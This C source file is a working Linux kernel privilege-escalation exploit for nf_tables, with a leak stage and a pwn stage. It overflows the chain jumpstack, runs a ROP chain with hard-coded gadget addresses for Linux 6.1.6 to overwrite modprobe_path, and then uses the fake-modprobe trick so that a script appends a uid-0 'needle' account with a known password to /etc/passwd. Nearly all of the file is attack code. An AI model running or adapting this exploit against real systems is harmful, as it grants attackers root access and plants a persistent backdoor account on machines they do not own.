#define _GNU_SOURCE
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdint.h>
#include <sys/types.h>
#include <linux/netfilter.h>
#include <linux/netfilter/nf_tables.h>
#include <linux/netfilter/nfnetlink.h>
#include <libmnl/libmnl.h>
#include <libnftnl/table.h>
#include <libnftnl/chain.h>
#include <libnftnl/rule.h>
#include <libnftnl/set.h>
#include <libnftnl/expr.h>
#include <fcntl.h>
#include <sys/stat.h>

#include "exploit.h"
#include "helpers.h"

/*
 * Split the raw in-memory bytes of a jumpstack_t into consecutive 4-byte rows.
 *
 * s:    structure to serialise (taken by value; its bytes, including any
 *       padding, are copied verbatim).
 * dest: output rows; row k receives bytes [4k, 4k + 4) of s. The caller must
 *       supply at least (sizeof(struct jumpstack_t) + 3) / 4 rows.
 *
 * If sizeof(s) is not a multiple of 4, the last row is zero-padded instead of
 * reading past the end of s.
 */
void split_struct(struct jumpstack_t s, char dest[][4])
{
    const unsigned char *bytes = (const unsigned char *) &s;
    const size_t total = sizeof(s);

    for (size_t off = 0; off < total; off += 4) {
        size_t chunk = (total - off < 4) ? total - off : 4;

        /* Copy through the byte view: no strict-aliasing violation and no
           misaligned word access (the struct may be packed). */
        memset(dest[off / 4], 0, 4);
        memcpy(dest[off / 4], bytes + off, chunk);
    }
}

/*
 * Build the fake jumpstack entry used by the pwn stage.
 *
 * reg0:  base address; rule = reg0 + 0xf8 and eval = reg0 + 0x108.
 * kaslr: slide added to the hard-coded pivot address (listed as the stack
 *        pivot gadget for Linux 6.1.6 in the gadget notes of this file).
 *
 * Every field not set below is zero. The pad field is filled entirely with 'A'.
 */
struct jumpstack_t fill_jumpstack(unsigned long reg0, unsigned long kaslr)
{
    struct jumpstack_t jumpstack = {0};

    jumpstack.init = 'A';
    jumpstack.rule = reg0 + 0xf8;
    jumpstack.last_rule = 0xffffffffffffffff;
    jumpstack.eval = reg0 + 0x108;
    jumpstack.pivot = 0xffffffff81134571 + kaslr;
    /* Bounded fill. A 31-char array initialised with 31 'A's has no NUL
       terminator, so strcpy() from it would over-read and overflow pad. */
    memset(jumpstack.pad, 'A', sizeof(jumpstack.pad));
    return jumpstack;
}

/*
 * Split a 64-bit value into two little-endian 4-byte groups.
 *
 * lsb receives bits 0..31 and msb receives bits 32..63, each least
 * significant byte first. Both must point to at least 4 chars.
 * Assumes unsigned long is 64 bits wide.
 */
void get_4_bytes(unsigned long address, char* lsb, char* msb)
{
    unsigned int shift = 0;

    while (shift < 32) {
        lsb[shift >> 3] = (char) ((address >> shift) & 0xffUL);
        msb[shift >> 3] = (char) ((address >> (shift + 32)) & 0xffUL);
        shift += 8;
    }
}

/*
 * Userland stage run after the kernel stage returns.
 *
 * Writes /tmp/windprobe, a shell script that appends a uid-0 "needle" entry
 * to /etc/passwd, and marks it executable. It then creates /tmp/dummy
 * containing 0xff bytes, makes it mode 0777 and execl()s it.
 *
 * Returns -1 if /tmp/dummy cannot be created or fully written, 0 otherwise.
 */
int privesc()
{
    puts("[+] Returned to userland, setting up for fake modprobe");
    // Password is just "needle"
    system("echo '#!/bin/sh\necho needle:M6Jplzqa7rJp.:0:0:root:/root:/bin/sh >> /etc/passwd' > /tmp/windprobe");
    system("chmod +x /tmp/windprobe");

    /* O_CREAT requires the mode argument; without it open() uses an
       indeterminate value. The chmod() below still forces 0777 regardless
       of the process umask. */
    int fd = open("/tmp/dummy", O_RDWR | O_CREAT, 0777);
    if (fd < 0) {
        perror("[-] Trigger creation failed");
        return -1;
    }
    char sig[] = "\xff\xff\xff\xff";
    /* sizeof(sig) includes the trailing NUL, so five bytes are written. */
    if (write(fd, sig, sizeof(sig)) != (ssize_t) sizeof(sig)) {
        perror("[-] Trigger write failed");
        close(fd);
        return -1;
    }
    close(fd);
    chmod("/tmp/dummy", 0777);
    /* execl() only returns on failure; its result is deliberately ignored.
       NOTE(review): the 0xff header is presumably chosen so that no binary
       format handler accepts the file; confirm. */
    execl("/tmp/dummy", "/tmp/dummy", (char *)NULL);
    return 0;
}

/*
 * Build and submit the rule of the final chain (pwn stage).
 *
 * Expressions are appended in this order. The order matters, so do not
 * reshuffle the calls below:
 *   1. 16 x 4-byte immediates loading the fake jumpstack built by
 *      fill_jumpstack()/split_struct() into NFT_REG32_00..NFT_REG32_15;
 *   2. a link-layer payload load of `len` bytes at `offset` with
 *      destination NFT_REG32_15;
 *   3. 14 x 4-byte immediates reloading NFT_REG32_00..NFT_REG32_13 with seven
 *      64-bit values, low half in the even register, high half in the odd one;
 *   4. an NFT_CONTINUE verdict.
 *
 * nl, table_name, chain_name, family, handle, seq: forwarded to build_rule()
 *     and send_batch_request().
 * offset, len: parameters of the payload expression in step 2.
 * regs:  leaked address; reg0 = regs + 0x10 is the base for the jumpstack
 *     pointers and for the saved rbp value.
 * instr: leaked kernel text address; kaslr = instr - INSTR_BASE is added to
 *     every hard-coded kernel address below.
 *
 * Returns the result of send_batch_request() (pwn() treats non-zero as
 * failure).
 */
int create_final_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len, unsigned long regs, unsigned long instr)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);

    /*
        There are only a few possible addresses where regs will end up, depending on the Linux version.
        Option 1 helps find these addresses, so the next allocation point can be predicted.
    */

    unsigned long reg0  = regs + 0x10;              // e.g. 0xffffc90000003af0; 0xffffc900000e0af0;
    unsigned long kaslr =  instr - INSTR_BASE;      // KASLR slide; INSTR_BASE must match the target build (change me)
    // NOTE(review): get_4_bytes() takes char*, but these are unsigned char[4]; expect a pointer-sign warning.
    unsigned char lsb[4] = {};
    unsigned char msb[4] = {};
    struct jumpstack_t jumpstack = fill_jumpstack(reg0, kaslr);
    // NOTE(review): 16 rows x 4 bytes assumes sizeof(struct jumpstack_t) <= 64; confirm against exploit.h.
    char dest[16][4];
    split_struct(jumpstack, dest);

    /*
    1. Prepare the jumpstack layout, saving space in the registers.
        &jumpstack[8].chain = 0xffffc90000003bf0 = reg0 + 0x100
        rule = reg0 + 0xf8 (0xffffc90000003be8, 8 bytes below that slot),
        eval = reg0 + 0x108 (0xffffc90000003bf8, 8 bytes above it)
        the last address (0xffffffff81134571) is the first gadget, a stack pivot to reg32_00

    Reference byte layouts, for reg0 = 0xffffc90000003af0 and reg0 = 0xffffc900000e0af0 respectively
    (documentation only; the live values come from fill_jumpstack()):

    unsigned char *jumpstack[] =  {"A\xe8\x3b\x00", "\x00\x00\xc9\xff", "\xff\xff\xff\xff", "\xff\xff\xff\xff", "\xff\xf8\x3b\x00", "\x00\x00\xc9\xff", "\xff\x71\x45\x13", "\x81\xff\xff\xff", "\xff\x41\x41\x41", 
       "AAAA", "AAAA", "AAAA", "AAAA", "AAAA","AAAA", "AAAA"};

    unsigned char *jumpstack[] =  {"A\xe8\x0b\x0e", "\x00\x00\xc9\xff", "\xff\xff\xff\xff", "\xff\xff\xff\xff", "\xff\xf8\x0b\x0e", "\x00\x00\xc9\xff", "\xff\x71\x45\x13", "\x81\xff\xff\xff", "\xff\x41\x41\x41", 
        "AAAA", "AAAA", "AAAA", "AAAA", "AAAA","AAAA", "AAAA"};
    */

    for (int reg = NFT_REG32_00; reg <= NFT_REG32_15; reg++) {
       rule_add_immediate_data(r, reg, (void *) dest[reg - NFT_REG32_00], 4);
    }

    /*
    2. Trigger overflow, overwriting the jumpstack
    */
    rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_15);

    /*
    3. ROP chain setup for Linux 6.1.6, change accordingly
        Gadgets:
            0xffffffff81134571: add rsp, 0x48 ; pop ... ; ret   -> stack pivot, pops 0x30 bytes including rbp to reach REG32_00
            0xffffffff81015b34: pop rax; ret                    -> save new modprobe path
            0xffffffff8107fec5: pop rdi; ret                    -> save modprobe_path address
            0xffffffff810d18a2: mov [rdi] rax ; pop rbp ; ret   -> overwrite modprobe_path and restore rbp
            0xffffffff810b3af0: mov rsp, rbp ; pop rbp ; ret    -> return from nft_do_chain
        Static values:
            0xffffffff81c2cfa1:                     Instruction from TEXT returned by leak without KASLR
            0xffffffff8308fb40:                     modprobe_path
            0x6e69772f706d742f:                     "/tmp/win" as a little-endian u64 (only 8 bytes are written;
                                                    NOTE(review): relies on the existing modprobe_path tail to
                                                    complete "/tmp/windprobe")
            reg0 + 0x2b0:                           old rbp for nft_hook_slow
        Each 64-bit value is split by get_4_bytes() into a low half (even register)
        and a high half (odd register).
    */
    unsigned long pop_rax_ret       = 0xffffffff81015b34 + kaslr;
    unsigned long local_path        = TMP_WINDPROBE;
    unsigned long pop_rdi_ret       = 0xffffffff8107fec5 + kaslr;
    unsigned long modprobe          = 0xffffffff8308fb40 + kaslr;
    unsigned long mov_rdi_rax_ret   = 0xffffffff810d18a2 + kaslr;
    unsigned long old_rbp           = reg0 + 0x2b0;
    unsigned long nft_hook_slow_ret = 0xffffffff810b3af0 + kaslr;
    
    get_4_bytes(pop_rax_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_00, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_01, (void *) msb, 4);

    get_4_bytes(local_path, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_02, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_03, (void *) msb, 4);

    get_4_bytes(pop_rdi_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_04, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_05, (void *) msb, 4);

    get_4_bytes(modprobe, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_06, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_07, (void *) msb, 4);

    get_4_bytes(mov_rdi_rax_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_08, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_09, (void *) msb, 4);

    get_4_bytes(old_rbp, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_10, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_11, (void *) msb, 4);

    get_4_bytes(nft_hook_slow_ret, lsb, msb);
    rule_add_immediate_data(r, NFT_REG32_12, (void *) lsb, 4);
    rule_add_immediate_data(r, NFT_REG32_13, (void *) msb, 4);

    // NFT_REG32_14 and NFT_REG32_15 (8 bytes) are not reloaded by step 3 and remain spare.

    // 4. Break from the regs verdict switch, going back to the corrupted previous chain
    rule_add_immediate_verdict(r, NFT_CONTINUE, "final_chain");
    
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

/*
 * Add the single rule of jump chain `chain_name` (a decimal number "0".."6").
 *
 * Chain "N" jumps to chain "N+1". The chain whose successor would be "7"
 * jumps to "final_chain" instead. A non-numeric name is parsed by atoi() as 0.
 *
 * Returns the result of send_batch_request() (pwn() treats non-zero as
 * failure).
 */
int create_jmp_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    int i = atoi(chain_name);
    i++;
    /* Large enough for any int in decimal ("-2147483648") plus the NUL, so the
       formatted name can never overflow. Kept at function scope in case the
       rule still refers to the string when it is sent. */
    char next_chain[12];
    snprintf(next_chain, sizeof(next_chain), "%d", i);

    if (i == 7) {
        // stackptr has been aligned, jump to the overflow chain
        rule_add_immediate_verdict(r, NFT_JUMP, "final_chain");
    } else {
        // Jump to the next jmp chain, incrementing stackptr
        rule_add_immediate_verdict(r, NFT_JUMP, next_chain);
    }

    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

/*
 * Add the base chain's rule for the pwn stage: an unconditional jump to
 * chain "0", the first of the numbered jump chains.
 *
 * Returns the result of send_batch_request() (pwn() treats non-zero as
 * failure).
 */
int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule *rule;

    rule = build_rule(table_name, chain_name, family, handle);
    rule_add_immediate_verdict(rule, NFT_JUMP, "0");

    return send_batch_request(nl,
                              NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
                              NLM_F_CREATE,
                              family,
                              (void **) &rule,
                              seq,
                              NULL);
}

/*
 * Add the base chain's rule for the leak stage: an unconditional goto to
 * "exploit_chain".
 *
 * No packet filtering is applied. UDP filtering is not always possible,
 * because the datagram might not be delivered (only broadcasts are received).
 * Custom filtering logic would go before the verdict, for example:
 *
 *     in_addr_t d_addr = inet_addr("192.168.123.123");
 *     rule_add_payload(r, NFT_PAYLOAD_NETWORK_HEADER, offsetof(struct iphdr, daddr), sizeof(d_addr), 8);
 *     rule_add_cmp(r, NFT_CMP_EQ, 8, &d_addr, sizeof d_addr);
 *
 * Returns the result of send_batch_request().
 */
int create_base_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule *rule;

    rule = build_rule(table_name, chain_name, family, handle);
    rule_add_immediate_verdict(rule, NFT_GOTO, "exploit_chain");

    return send_batch_request(nl,
                              NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
                              NLM_F_CREATE,
                              family,
                              (void **) &rule,
                              seq,
                              NULL);
}

/*
 * Build and submit the leak rule of the exploit chain.
 *
 * Expressions are appended in this order:
 *   1. 0xffffffff immediates into NFT_REG32_00..NFT_REG32_07 and
 *      NFT_REG32_09..NFT_REG32_15, so that later reads show whether a register
 *      was overwritten. NOTE(review): NFT_REG32_08 is never primed; confirm
 *      this is intentional.
 *   2. a link-layer payload load of `len` bytes at `offset` into NFT_REG32_00;
 *   3. two dynset updates of "myset12" with (key, data) register pairs
 *      (NFT_REG32_06, NFT_REG32_07) and (NFT_REG32_14, NFT_REG32_15).
 *
 * Other kernel builds may leak addresses into different registers. The
 * candidate pairs to try are (NFT_REG32_00 + k, NFT_REG32_08 + k) for k = 0..7.
 *
 * Returns the result of send_batch_request().
 */
int create_exploit_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len)
{
    static const char sentinel[] = "\xff\xff\xff\xff";
    struct nftnl_rule *rule = build_rule(table_name, chain_name, family, handle);
    unsigned int reg;

    // 1. Prime registers with a recognisable pattern
    for (reg = NFT_REG32_00; reg <= NFT_REG32_07; reg++) {
        rule_add_immediate_data(rule, reg, (void *) sentinel, 4);
    }
    for (reg = NFT_REG32_09; reg <= NFT_REG32_15; reg++) {
        rule_add_immediate_data(rule, reg, (void *) sentinel, 4);
    }

    // 2. Trigger the overflow that overwrites the registers
    rule_add_payload(rule, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_00);

    // 3. Copy the registers of interest into the set
    rule_add_dynset(rule, "myset12", NFT_REG32_06, NFT_REG32_07);
    rule_add_dynset(rule, "myset12", NFT_REG32_14, NFT_REG32_15);

    return send_batch_request(nl,
                              NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
                              NLM_F_CREATE,
                              family,
                              (void **) &rule,
                              seq,
                              NULL);
}

int pwn(struct mnl_socket* nl, unsigned long regs, unsigned long instr) 
{
    char *table_name = "exploit_table", 
         *base_chain_name = "base_chain",
         *final_chain_name = "final_chain",
         *dev_name = "eth0";
         
    int seq = time(NULL);

    if (create_table(nl, table_name, NFPROTO_NETDEV, &seq, NULL) == -1) {
        perror("[-] Failed creating table");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created nft %s\n", table_name);

    struct unft_base_chain_param bp;
    bp.hook_num = NF_INET_PRE_ROUTING;
    bp.prio = 10;
    if (create_chain(nl, table_name, base_chain_name, dev_name, NFPROTO_NETDEV, &bp, &seq, NULL)) {
        perror("[-] Failed creating base chain");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created base chain %s\n", base_chain_name);

    if (create_chain(nl, table_name, final_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
        perror("[-] Failed creating final chain");
        exit(EXIT_FAILURE);
    }
    printf("[+] Created final chain %s\n", final_chain_name);

    char jmp_chain_name[5];
    for (int i = 0; i < 7; i++) {
        sprintf(jmp_chain_name, "%d", i);
        if (create_chain(nl, table_name, jmp_chain_name, dev_name, NFPROTO_NETDEV, NULL, &seq, NULL)) {
            perror("[-] Failed creating jmp chain");
            exit(EXIT_FAILURE);
        }
        printf("[+] Created jmp chain %s\n", jmp_chain_name);
    }

    if (create_base_chain_rule_pwn(nl, table_name, base_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
        perror("[-] Failed creating base chain rule");
        exit(EXIT_FAILURE);
    }

    puts("[+] Successfully created base_chain rule!");
    for (int i = 0; i < 7; i++) {
        sprintf(jmp_chain_name, "%d", i);
        if (create_jmp_chain_rule(nl, table_name, jmp_chain_name, NFPROTO_NETDEV, NULL, &seq)) {
            perror("[-] Failed creating jmp chain rule");
            exit(EXIT_FAILURE);
        }
        puts("[+] Successfully created jmp chain rule!");
    }

    uint8_t offset = 19, len = 4, vlan_hlen = 4;
    uint8_t ethlen = len - offset + len - VLAN_ETH_HLEN + vlan_hlen;
    if (create_final_chain_rule(nl, table_name, final_chain_name, NFPROTO_NETDEV, NULL, &seq, offset, len, regs, instr)) {
        perror("[-] Failed creating final chain rule");
        return EXIT_FAILURE;
    }
    printf("[+] offset: %hhu & len: %hhu & ethlen = %hhu\n", offset, len, ethlen);
    puts("[+] Successfully created exploit chain rule!");

    if (send_packet() == 0) {
        // Please do not interrupt
        system("nft delete table netdev exploit_table");
        puts("[+] Exploit triggered");
        if (privesc() == 0) {
            puts("[+] Got root, you can now login as \"needle:needle\"");
            return EXIT_SUCCESS;
        }
    }
    return EXIT_FAILURE;
}